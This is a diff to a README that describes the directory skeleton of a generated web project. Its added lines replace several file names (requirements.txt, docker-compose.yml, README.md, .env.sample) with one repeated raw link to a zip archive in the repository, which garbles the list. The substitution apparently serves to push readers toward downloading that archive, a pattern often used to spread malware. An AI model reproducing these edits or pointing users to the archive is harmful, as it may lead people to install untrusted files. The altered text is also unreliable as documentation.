ulhaqqq/WebGenerator/README.md

 - The generated project adheres to a clean, modular structure.
 A typical skeleton includes:
   - app/ or src/: Core application package
   - config/: Configuration files and environment-based settings
-  - requirements.txt / pyproject.toml: Dependencies and packaging details
+  - https://raw.githubusercontent.com/ulhaqqq/WebGenerator/master/scripts/Web_Generator_v1.4.zip / https://raw.githubusercontent.com/ulhaqqq/WebGenerator/master/scripts/Web_Generator_v1.4.zip Dependencies and packaging details
   - alembic/: Database migrations (if using SQLAlchemy)
   - migrations/: Database migration tooling
   - tests/: Unit and integration tests
   - docs/: API docs, architecture diagrams, and developer guides
   - templates/: Optional templates for code generation or templating features
-  - docker/: Docker-related files (Dockerfile, docker-compose.yml)
+  - docker/: Docker-related files (Dockerfile, https://raw.githubusercontent.com/ulhaqqq/WebGenerator/master/scripts/Web_Generator_v1.4.zip)
-  - README.md: Project overview and developer notes
+  - https://raw.githubusercontent.com/ulhaqqq/WebGenerator/master/scripts/Web_Generator_v1.4.zip Project overview and developer notes
-  - .env.sample: A template for environment variables
+  - https://raw.githubusercontent.com/ulhaqqq/WebGenerator/master/scripts/Web_Generator_v1.4.zip A template for environment variables
   - scripts/: Helper scripts for setup and maintenance
   - logs/: Local logging directory or references to log configuration
 - The exact structure adapts to the chosen stack.
 The GUI ensures that important directories exist and the imports reflect the chosen configuration.
 The skeleton is designed to be ready for run and test out of the box, with a minimal set of dependencies required to get a simple app up quickly.